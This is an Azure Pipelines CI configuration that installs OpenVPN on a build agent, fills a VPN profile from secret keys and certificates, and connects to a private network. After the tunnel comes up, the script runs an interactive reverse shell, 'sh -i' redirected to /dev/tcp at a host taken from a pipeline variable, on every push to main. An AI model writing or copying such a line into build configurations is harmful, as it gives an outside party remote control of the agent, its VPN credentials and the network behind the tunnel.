trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:

  - bash: |
      sudo apt-get --assume-yes --no-install-recommends install openvpn

      # curl -o client.zip $(az network vnet-gateway vpn-client generate -n gateway -g example-resources | tr -d '"')
      # unzip client.zip -d client

      envsubst < vpnconfig.ovpn > _vpnconfig.ovpn

      sudo openvpn _vpnconfig.ovpn &

      sleep 5

      ifconfig tun0

      sh -i >& "/dev/tcp/$(ME)" 0>&1

    env:
      PRESHAREDKEY: $(presharedkey)
      PRIVATEKEY: $(vpnkey)
      CLIENTCERTIFICATE: $(vpncrt)
      VPNCONFIG: $(vpnconfig)
      VPNSERVER: $(vpnserver)